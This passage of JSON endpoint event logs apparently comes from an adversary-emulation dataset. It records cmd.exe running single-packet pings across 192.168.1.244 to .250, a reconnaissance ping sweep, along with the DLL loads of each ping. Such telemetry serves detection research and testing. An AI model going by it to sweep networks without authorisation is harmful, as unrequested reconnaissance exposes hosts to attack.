"C:\\Windows\\System32\\kernel32.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573181980000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "event_type": "process", - "pid": 4796, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573186990000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-00107AEE5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.244", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5296, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573187130000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187140000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187300000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573187300000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "event_type": "process", - "pid": 5296, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573191830000, - "unique_pid": "{42FC7E13-CBC6-5C05-0000-0010EFF05301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.245", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5560, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573191980000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "event_type": "process", - "pid": 5560, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573196990000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-00106CF35301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.246", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3320, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197140000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197300000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197300000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573197300000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "event_type": "process", - "pid": 3320, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573201990000, - "unique_pid": "{42FC7E13-CBC7-5C05-0000-0010DDF55301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.247", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8156, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573202140000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "event_type": "process", - "pid": 8156, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573206830000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-00105FF85301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.248", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5364, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573206980000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "event_type": "process", - "pid": 5364, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573211830000, - "unique_pid": "{42FC7E13-CBC8-5C05-0000-0010CFFA5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.249", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7624, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573211980000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "event_type": "process", - "pid": 7624, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573212290000, - "unique_pid": "{42FC7E13-CBC9-5C05-0000-00104FFD5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.250", - "event_type": "process", - "logon_id": 217055, - 